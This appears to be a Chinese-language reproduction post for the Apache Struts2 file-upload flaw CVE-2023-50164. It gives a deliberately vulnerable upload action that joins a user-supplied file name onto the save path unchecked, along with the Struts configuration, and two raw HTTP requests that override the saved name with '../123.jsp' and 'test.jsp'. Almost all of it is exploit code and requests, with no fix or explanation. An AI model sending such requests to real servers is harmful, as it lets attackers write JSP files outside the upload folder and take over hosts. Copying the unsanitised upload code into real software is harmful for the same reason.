【漏洞复现】Apache Struts2 CVE-2023-50164

<dependency>      <groupId>org.apache.struts</groupId>      <artifactId>struts2-core</artifactId>      <version>6.3.0</version></dependency>

package com.struts2;



import com.opensymphony.xwork2.ActionSupport;import org.apache.commons.io.FileUtils;import org.apache.struts2.ServletActionContext;



import java.io.*;



public class UploadAction extends ActionSupport {



    private static final long serialVersionUID = 1L;







    private File upload;



    // 文件类型，为name属性值 + ContentType    private String uploadContentType;



    // 文件名称，为name属性值 + FileName    private String uploadFileName;



    public File getUpload() {        return upload;    }



    public void setUpload(File upload) {        this.upload = upload;    }



    public String getUploadContentType() {        return uploadContentType;    }



    public void setUploadContentType(String uploadContentType) {        this.uploadContentType = uploadContentType;    }



    public String getUploadFileName() {        return uploadFileName;    }



    public void setUploadFileName(String uploadFileName) {        this.uploadFileName = uploadFileName;    }



    public String doUpload() {        String path = "D:\up\";        String realPath = path + File.separator +uploadFileName;        try {            FileUtils.copyFile(upload, new File(realPath));        } catch (Exception e) {            e.printStackTrace();        }        return SUCCESS;    }    }

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE struts PUBLIC        "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"        "http://struts.apache.org/dtds/struts-2.0.dtd"><struts>    <package name="upload" extends="struts-default">        <action name="upload" class="com.struts2.UploadAction" method="doUpload">            <result name="success" type="">/index.jsp</result>        </action>    </package></struts>

<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" >



<web-app>  <display-name>Archetype Created Web Application</display-name>



  <filter>    <filter-name>struts2</filter-name>    <filter-class>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter</filter-class>  </filter>  <filter-mapping>    <filter-name>struts2</filter-name>    <url-pattern>*.action</url-pattern>  </filter-mapping></web-app>

<html><body><h2>Hello World!</h2><form action="upload.action" method="post" enctype="multipart/form-data">    <input type="file" name="Upload" />    <input type="submit" value="Upload" /></form></body></html>

POST /untitled4_war_exploded/upload.action HTTP/1.1Host: localhost:8080Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brSec-Fetch-User: ?1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------299952630938737678921373326300Upgrade-Insecure-Requests: 1Sec-Fetch-Site: same-originUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Sec-Fetch-Mode: navigateOrigin: http://localhost:8080Sec-Fetch-Dest: documentCookie: JSESSIONID=4519C8974359B23EE133A5CEA707D7D0; USER_NAME_COOKIE=admin; SID_1=69cf26c6Referer: http://localhost:8080/untitled4_war_exploded/Content-Length: 63765



-----------------------------299952630938737678921373326300Content-Disposition: form-data; name="Upload"; filename="12.txt"Content-Type: image/png



111-----------------------------299952630938737678921373326300Content-Disposition: form-data; name="uploadFileName"; Content-Type: text/plain



../123.jsp-----------------------------299952630938737678921373326300--

POST /untitled4_war_exploded/upload.action?uploadFileName=test.jsp HTTP/1.1Host: localhost:8080Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brSec-Fetch-User: ?1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------299952630938737678921373326300Upgrade-Insecure-Requests: 1Sec-Fetch-Site: same-originUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Sec-Fetch-Mode: navigateOrigin: http://localhost:8080Sec-Fetch-Dest: documentCookie: JSESSIONID=4519C8974359B23EE133A5CEA707D7D0; USER_NAME_COOKIE=admin; SID_1=69cf26c6Referer: http://localhost:8080/untitled4_war_exploded/Content-Length: 63765



-----------------------------299952630938737678921373326300Content-Disposition: form-data; name="Upload"; filename="12.txt"Content-Type: image/png



111-----------------------------299952630938737678921373326300--